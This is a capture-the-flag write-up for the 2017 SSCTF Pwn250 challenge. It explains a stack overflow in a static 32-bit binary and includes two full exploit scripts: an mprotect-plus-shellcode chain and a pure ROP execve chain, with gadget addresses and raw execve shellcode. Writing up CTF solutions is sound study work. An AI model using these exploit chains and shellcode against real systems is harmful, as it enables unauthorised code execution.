2017 SSCTF - Pwn250

漏洞很简单：一个栈溢出。从两个脚本的填充长度看，覆盖到返回地址需要 62 字节（脚本二按 0x3a 字节填充 + 4 字节 saved ebp 来摆放）。脚本里全部使用写死的绝对地址（mprotect、read、int 0x80 gadget 都落在 0x0806xxxx～0x080exxxx），说明目标应是静态链接、无 PIE 的 32 位程序，因此不需要泄露地址。两种利用方式如下：

方法一：用 mprotect 把程序自身的一页内存改成 RWX，再用 read 把 shellcode 写进去并跳过去执行

#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from pwn import *

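# switches

# No arguments -> run the binary locally; otherwise argv[1]/argv[2] are the
# remote host and port.  DEBUG stays an int (1/0) because the rest of the
# script tests it with a plain `if DEBUG:`.
if len(sys.argv) == 1:
    DEBUG = 1
else:
    DEBUG = 0

# modify this
if DEBUG:
    io = process('./250')
    #gdb.attach(io,'#b main')
else:
    # A half-given target (host but no port) used to die with an IndexError;
    # fail with a usage line instead.
    if len(sys.argv) < 3:
        sys.exit('usage: %s [HOST PORT]' % sys.argv[0])
    io = remote(sys.argv[1], int(sys.argv[2]))

context(log_level='debug')

# define symbols and offsets here

# Every address below is absolute: the target is presumably a statically
# linked, non-PIE i386 binary (libc routines such as mprotect/read live at
# fixed 0x0806xxxx addresses inside the image) -- TODO confirm with checksec.
mprotect = 0x0806E070   # mprotect(addr, len, prot), linked into the binary
main_addr = 0x08048886  # return here after mprotect so the overflow can be hit again
read = 0x0806D510       # read(fd, buf, count), linked into the binary
# NOTE: despite the name this is NOT the stack.  It is the page of the
# binary's own image right after the one holding main; it gets remapped
# RWX by mprotect and then receives the shellcode.
stack = 0x08049000
size = 0x1000           # one page; mprotect needs a page-aligned start
prop = 7                # PROT_READ | PROT_WRITE | PROT_EXEC (defeats W^X for that page)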

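# define exploit function here
def pwn():
    """Run the two-stage mprotect + shellcode exploit over the global `io`.

    Stage 1 overflows the stack buffer so the vulnerable function returns
    into mprotect(stack, size, prop), which remaps the target page RWX, and
    mprotect then "returns" into main so the overflow can be reached again.
    Stage 2 overflows once more to call read(0, stack, len(shellcode)) and
    has read "return" into `stack`, where the shellcode has just landed.

    The size the program asks for must equal the number of payload bytes
    that follow, so it is derived from the payload instead of hand-counted
    (the values are 82 and 90, as in the original script).
    """
    # 62 bytes of filler reach the saved return address.
    eip_offset = 62

    # Stage 1: ret -> mprotect(stack, size, prop), then -> main.
    payload1 = 'A' * eip_offset
    payload1 += p32(mprotect)   # overwritten return address
    payload1 += p32(main_addr)  # mprotect's return address
    payload1 += p32(stack) + p32(size) + p32(prop)  # mprotect's three arguments
    io.recvuntil('[InPut Data Size]')
    io.sendline(str(len(payload1)))
    io.recvuntil('[YourData]')
    io.send(payload1)

    # Stage 2: ret -> read(0, stack, ssize), then -> stack (the shellcode).
    # 24-byte execve("/bin//sh", NULL, NULL) via int 0x80.
    shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
    ssize = len(shellcode)
    payload2 = 'A' * eip_offset
    payload2 += p32(read)   # overwritten return address
    payload2 += p32(stack)  # read's return address: jump into the shellcode
    payload2 += p32(0) + p32(stack) + p32(ssize)  # read(fd=0, buf=stack, count=ssize)
    payload2 += 'THE END!'  # trailing marker; its recvuntil is left commented out below
    io.recvuntil('[InPut Data Size]')
    io.sendline(str(len(payload2)))
    io.recvuntil('[YourData]')
    io.send(payload2)
    #io.recvuntil('THE END!')
    # The shellcode goes out as a separate write, presumably so it is not
    # swallowed by the same read() that consumed payload2 -- the pause makes
    # sure the chain has reached read(0, stack, ssize) first.
    raw_input('send?')
    io.send(shellcode)
    io.interactive()
    return

if __name__ == '__main__':
    pwn()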

方法二:

方法二：纯 ROP —— 先用 read 把 "/bin/sh" 写到 .bss，再依次布置 eax=0xb、ebx=bss、ecx=0、edx=0 并执行 int 0x80，由 execve 起 shell（by pxx）

from pwn import*
import time
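def pwn(io):
    """Pure-ROP variant: read "/bin/sh" into .bss, then execve it via int 0x80.

    `io` is an already-connected tube.  It is used through read_until /
    writeline / gdb_hint / interact, i.e. a zio-style object rather than a
    pwntools tube; `l32` and `gen_rop_data` come from the same environment
    and are not defined in this file.

    Chain (all addresses fixed -- no PIE, libc code linked into the binary;
    TODO confirm):
      1. read(0, bss_addr, 8)              -- pull "/bin/sh\\0" into writable .bss
      2. eax = 0xb (SYS_execve), ebx = bss_addr, ecx = 0, edx = 0
      3. int 0x80                          -- execve("/bin/sh", NULL, NULL)

    Unused leftovers from the original (a pwntools shellcode that was never
    sent, an `add ebx, esp` / `mov eax, ebx` gadget pair, a second copy of
    p_ebx_ret and a `_dl_make_stack_executable` address) have been dropped.
    """
    io.read_until("]")

    # ROP gadgets for ./250
    p_eax_ret = 0x080b89e6   # pop eax ; ret
    p_ebx_ret = 0x080481c9   # pop ebx ; ret
    p_ecx_ret = 0x080df1b9   # pop ecx ; ret
    p_edx_ret = 0x0806efbb   # pop edx ; ret
    int80_addr = 0x0806cbb5  # int 0x80

    read_addr = 0x0806D510   # read() linked into the binary
    bss_addr = 0x080ece00    # writable scratch area that receives "/bin/sh"

    # 0x3a bytes of buffer plus 4 bytes of saved ebp (set to 0) reach the
    # return address.
    payload = ""
    payload += "a" * 0x3a
    payload += l32(0)
    # read(0, bss_addr, 8).  gen_rop_data is expected to emit the call plus
    # whatever gadget pops the three arguments so the chain continues below.
    payload += gen_rop_data(read_addr, [0, bss_addr, 8])
    payload += l32(p_eax_ret)
    payload += l32(0xb)        # SYS_execve
    payload += l32(p_ebx_ret)
    payload += l32(bss_addr)   # filename
    payload += l32(p_ecx_ret)
    payload += l32(0)          # argv = NULL
    payload += l32(p_edx_ret)
    payload += l32(0)          # envp = NULL
    payload += l32(int80_addr)

    # Declare a generous input size, then deliver the chain.
    io.writeline(str(1000))
    io.read_until("]")

    io.gdb_hint()
    io.writeline(payload)
    io.read_until("]")

    # Give the chain time to reach read() before feeding it its 8 bytes.
    # writeline appends "\n", which read(…, 8) does not consume; it simply
    # stays in the input stream and reaches the spawned shell.
    time.sleep(1)
    io.writeline("/bin/sh\x00")
    io.interact()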

io.interact()  # NOTE(review): `io` is not defined at module level in this listing -- this looks like a stray duplicate of the interact() call that already ends pwn(); confirm against the original script before running it